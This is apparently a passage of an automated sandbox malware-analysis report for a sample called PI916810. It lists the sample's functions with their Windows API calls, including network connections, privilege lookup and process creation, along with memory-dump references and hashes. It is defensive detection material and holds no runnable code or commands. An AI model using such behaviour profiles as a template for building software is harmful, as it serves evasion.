                                                                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 004B8BEB
                                                                                                                                                                            • _memcmp.LIBCMT ref: 004B8C0E
                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004B8C44
                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 004B8C4B
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1592001646-0
                                                                                                                                                                            • Opcode ID: e34eea1f946425e1973da2d4d78e908a5a368371840bd5d3712c65421a26f7c1
                                                                                                                                                                            • Instruction ID: 0d4353ebc239fd040f6b226193035fe5210e83ed8be4cc4e35203a048ce96c6d
                                                                                                                                                                            • Opcode Fuzzy Hash: e34eea1f946425e1973da2d4d78e908a5a368371840bd5d3712c65421a26f7c1
                                                                                                                                                                            • Instruction Fuzzy Hash: 7A216BB1E01209EBDB10DFA4C945BEEBBB8EF44354F14406AE554AB241DB35AE06CB64
                                                                                                                                                                            Function 004D1A5B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 004D1A97
                                                                                                                                                                              • Part of subcall function 004D1B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 004D1B40
                                                                                                                                                                              • Part of subcall function 004D1B21: InternetCloseHandle.WININET(00000000), ref: 004D1BDD
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Internet$CloseConnectHandleOpen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1463438336-0
                                                                                                                                                                            • Opcode ID: 11675524aaa06b181925bcda8f7bc3ed3df84180016f4fffccef46f2dbc08705
                                                                                                                                                                            • Instruction ID: b4ef365ea3d8cd4c48cf0b90439f6c5ebcc8e145811b5051d2e903b1ff2f8755
                                                                                                                                                                            • Opcode Fuzzy Hash: 11675524aaa06b181925bcda8f7bc3ed3df84180016f4fffccef46f2dbc08705
                                                                                                                                                                            • Instruction Fuzzy Hash: 24219235200601BFDB119F608C21FBBB7A9FF94701F10402BF95196761E775A8159B98
                                                                                                                                                                            Function 004BE1AF Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 004BF5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,004BE1C4,?,?,?,004BEFB7,00000000,000000EF,00000119,?,?), ref: 004BF5BC
                                                                                                                                                                              • Part of subcall function 004BF5AD: lstrcpyW.KERNEL32(00000000,?,?,004BE1C4,?,?,?,004BEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 004BF5E2
                                                                                                                                                                              • Part of subcall function 004BF5AD: lstrcmpiW.KERNEL32(00000000,?,004BE1C4,?,?,?,004BEFB7,00000000,000000EF,00000119,?,?), ref: 004BF613
                                                                                                                                                                            • lstrlenW.KERNEL32(?,00000002,?,?,?,?,004BEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 004BE1DD
                                                                                                                                                                            • lstrcpyW.KERNEL32(00000000,?,?,004BEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 004BE203
                                                                                                                                                                            • lstrcmpiW.KERNEL32(00000002,cdecl,?,004BEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 004BE237
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                                            • String ID: cdecl
                                                                                                                                                                            • API String ID: 4031866154-3896280584
                                                                                                                                                                            • Opcode ID: 6729733152ebe1d972d94848f15ca4b3e7e45b636dd60f531a3598d182b9c52f
                                                                                                                                                                            • Instruction ID: 1d4cd06d44d4d5394509fb5589eddcaab657f943e9d112671e2c320663d9bde7
                                                                                                                                                                            • Opcode Fuzzy Hash: 6729733152ebe1d972d94848f15ca4b3e7e45b636dd60f531a3598d182b9c52f
                                                                                                                                                                            • Instruction Fuzzy Hash: DA11BE3A200345EFCB29AF65DC459BA77A8FF85310B40806BE906CB260EB75985587A9
                                                                                                                                                                            Function 00495332 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • _free.LIBCMT ref: 00495351
                                                                                                                                                                              • Part of subcall function 0048594C: __FF_MSGBANNER.LIBCMT ref: 00485963
                                                                                                                                                                              • Part of subcall function 0048594C: __NMSG_WRITE.LIBCMT ref: 0048596A
                                                                                                                                                                              • Part of subcall function 0048594C: RtlAllocateHeap.NTDLL(00D20000,00000000,00000001,00000000,?,?,?,00481013,?), ref: 0048598F
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AllocateHeap_free
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 614378929-0
                                                                                                                                                                            • Opcode ID: 42a5fe947f4b67e1a8da4e857ad797e44d0b63412945275efdc057953a714c73
                                                                                                                                                                            • Instruction ID: 08abee49b4e218a2bc340acb3a028f842ec4a1003cbe5b3e9d3ee8a5b48427eb
                                                                                                                                                                            • Opcode Fuzzy Hash: 42a5fe947f4b67e1a8da4e857ad797e44d0b63412945275efdc057953a714c73
                                                                                                                                                                            • Instruction Fuzzy Hash: 4211C132504A15AECF323F71A84566E3F989F103A4B30483FFD059A291DABD8941979C
                                                                                                                                                                            Function 00464531 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • _memset.LIBCMT ref: 00464560
                                                                                                                                                                              • Part of subcall function 0046410D: _memset.LIBCMT ref: 0046418D
                                                                                                                                                                              • Part of subcall function 0046410D: _wcscpy.LIBCMT ref: 004641E1
                                                                                                                                                                              • Part of subcall function 0046410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 004641F1
                                                                                                                                                                            • KillTimer.USER32(?,00000001,?,?), ref: 004645B5
                                                                                                                                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004645C4
                                                                                                                                                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0049D6CE
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1378193009-0
                                                                                                                                                                            • Opcode ID: 28c138619c14e5413f727c3b8a60af6c15cf66cea1350129b45c8b3213c19085
                                                                                                                                                                            • Instruction ID: 55ee5c46b06adfd9a0a6034d84c90423d01dd5537dc88d2544732e9f58429385
                                                                                                                                                                            • Opcode Fuzzy Hash: 28c138619c14e5413f727c3b8a60af6c15cf66cea1350129b45c8b3213c19085
                                                                                                                                                                            • Instruction Fuzzy Hash: E821F870904384AFEF328B248C55BE7BFEC9F51308F0000AFE69E56241D7781E898B5A
                                                                                                                                                                            Function 004C40B1 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 004C40D1
                                                                                                                                                                            • _memset.LIBCMT ref: 004C40F2
                                                                                                                                                                            • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 004C4144
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004C414D
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1157408455-0
                                                                                                                                                                            • Opcode ID: 2b7b32727a8fc1f5070540506cfbba78585c7c42ff7e373c2bcff8f0935f7b83
                                                                                                                                                                            • Instruction ID: 2c6b54855db6ab0e813f9f0dac7129c4251b3ef9c5319ec26a257ad64ac6e052
                                                                                                                                                                            • Opcode Fuzzy Hash: 2b7b32727a8fc1f5070540506cfbba78585c7c42ff7e373c2bcff8f0935f7b83
                                                                                                                                                                            • Instruction Fuzzy Hash: 6C11EB75D012287AD7309BA59C4DFABBB7CEF84760F1041AAF908D7180D6744E848BA8
                                                                                                                                                                            Function 004D667C Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00465B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,004C7B20,?,?,00000000), ref: 00465B8C
                                                                                                                                                                              • Part of subcall function 00465B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,004C7B20,?,?,00000000,?,?), ref: 00465BB0
                                                                                                                                                                            • gethostbyname.WSOCK32(?), ref: 004D66AC
                                                                                                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 004D66B7
                                                                                                                                                                            • _memmove.LIBCMT ref: 004D66E4
                                                                                                                                                                            • inet_ntoa.WSOCK32(?), ref: 004D66EF
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1504782959-0
                                                                                                                                                                            • Opcode ID: 8ea32861b9a95f4b4d851b07f3bc7052717ff1cf3d9d5a64c84a4e24a62f009b
                                                                                                                                                                            • Instruction ID: 82f7b530fbe10d13191fcf0cd1c7ca9084b34c26ad2d1c3b125351e12805d869
                                                                                                                                                                            • Opcode Fuzzy Hash: 8ea32861b9a95f4b4d851b07f3bc7052717ff1cf3d9d5a64c84a4e24a62f009b
                                                                                                                                                                            • Instruction Fuzzy Hash: 5B114F75500508ABCB00FBA5DD96DEE77B8BF04314B14416FF502A7262EB34AE04CB6A
                                                                                                                                                                            Function 004B9023 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 004B9043
                                                                                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004B9055
                                                                                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004B906B
                                                                                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004B9086
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                            • Opcode ID: 8dbdbb8759a390a36b63ad5afcae3575b27ced0add9b908a005315f1d2fe4ec3
                                                                                                                                                                            • Instruction ID: e7b4d0867e53092402090cf5118fbbb65b67745a93988a62e1992a613d164e7e
                                                                                                                                                                            • Opcode Fuzzy Hash: 8dbdbb8759a390a36b63ad5afcae3575b27ced0add9b908a005315f1d2fe4ec3
                                                                                                                                                                            • Instruction Fuzzy Hash: 24115E79900218FFDB10DFA5CC84EDEBBB4FB48310F2040A6EA04B7250D6716E11DBA4
                                                                                                                                                                            Function 00461290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00462612: GetWindowLongW.USER32(?,000000EB), ref: 00462623
                                                                                                                                                                            • DefDlgProcW.USER32(?,00000020,?), ref: 004612D8
                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 0049B84B
                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 0049B855
                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 0049B860
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4127811313-0
                                                                                                                                                                            • Opcode ID: bc6abefca22ddbe506c5c6909f3323eb16641144c9f0ab06f4973b7099777b28
                                                                                                                                                                            • Instruction ID: b2c386d1bc7236c9215b075011f1936a65785b24bfe708bfbeb0045d7a9f5546
                                                                                                                                                                            • Opcode Fuzzy Hash: bc6abefca22ddbe506c5c6909f3323eb16641144c9f0ab06f4973b7099777b28
                                                                                                                                                                            • Instruction Fuzzy Hash: 20116D75900099BFCB00DFA4D8959FE77B8FF05301F0404A6F901E7251D734BA568BAA
                                                                                                                                                                            Function 004C1652 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,004C01FD,?,004C1250,?,00008000), ref: 004C166F
                                                                                                                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,004C01FD,?,004C1250,?,00008000), ref: 004C1694
                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,004C01FD,?,004C1250,?,00008000), ref: 004C169E
                                                                                                                                                                            • Sleep.KERNEL32(?,?,?,?,?,?,?,004C01FD,?,004C1250,?,00008000), ref: 004C16D1
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2875609808-0
                                                                                                                                                                            • Opcode ID: da83e0f0b924072c2834c4d5cf08578fc3d24a1fe2229b7e0db67a2d5ce8d588
                                                                                                                                                                            • Instruction ID: 0e96a1edad286a1e6078c5393aff790f95a915819db05aaacf6d4531a23fbc47
                                                                                                                                                                            • Opcode Fuzzy Hash: da83e0f0b924072c2834c4d5cf08578fc3d24a1fe2229b7e0db67a2d5ce8d588
                                                                                                                                                                            • Instruction Fuzzy Hash: C3118235D0051CD7CF00AFA5D984BEEFB78FF0A711F08406AD940B6251CB3495548B9A
                                                                                                                                                                            Function 00497207 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3016257755-0
                                                                                                                                                                            • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                                                                            • Instruction ID: e44cbc024a9f844d262fe1dd88744d824ba1349fcaa727bbf75c7f22d18af153
                                                                                                                                                                            • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                                                                            • Instruction Fuzzy Hash: 7101807206414ABBCF125F84CC01CEE3F22BF59344F088566FA1858131C23BC9B1AB89
                                                                                                                                                                            Function 004EB57F Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 004EB59E
                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 004EB5B6
                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 004EB5DA
                                                                                                                                                                            • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004EB5F5
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 357397906-0
                                                                                                                                                                            • Opcode ID: 7ee3cf1c57fdc88a1e2b173877df77b6e67ddf1064ea63552d60eef75f6b0241
                                                                                                                                                                            • Instruction ID: 8dbdefbcffe6f2cac6ba8e94c2ac544bbf998fc66e7a0f9891ba8feca26d7930
                                                                                                                                                                            • Opcode Fuzzy Hash: 7ee3cf1c57fdc88a1e2b173877df77b6e67ddf1064ea63552d60eef75f6b0241
                                                                                                                                                                            • Instruction Fuzzy Hash: 541166B5D00249EFDB01CFA9C484AEEFBB5FF08310F108166E914E3220D735AA558F94
                                                                                                                                                                            Function 004EB8EF Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • _memset.LIBCMT ref: 004EB8FE
                                                                                                                                                                            • _memset.LIBCMT ref: 004EB90D
                                                                                                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00527F20,00527F64), ref: 004EB93C
                                                                                                                                                                            • CloseHandle.KERNEL32 ref: 004EB94E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _memset$CloseCreateHandleProcess
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3277943733-0
                                                                                                                                                                            • Opcode ID: a31793efec21ca4096d84a771b981f8ab930c3a42945fcef2cfc6b13126ace8b
                                                                                                                                                                            • Instruction ID: 29395e71ba5ade5976bd7d85e21ef2d5ad2d8d7ed17da574d6d561c3eafb10c1
                                                                                                                                                                            • Opcode Fuzzy Hash: a31793efec21ca4096d84a771b981f8ab930c3a42945fcef2cfc6b13126ace8b
                                                                                                                                                                            • Instruction Fuzzy Hash: F8F0BEB25483187BE220AB61AC45FBB3A8CEF0E748F000031BB08D92A6D775480497BC
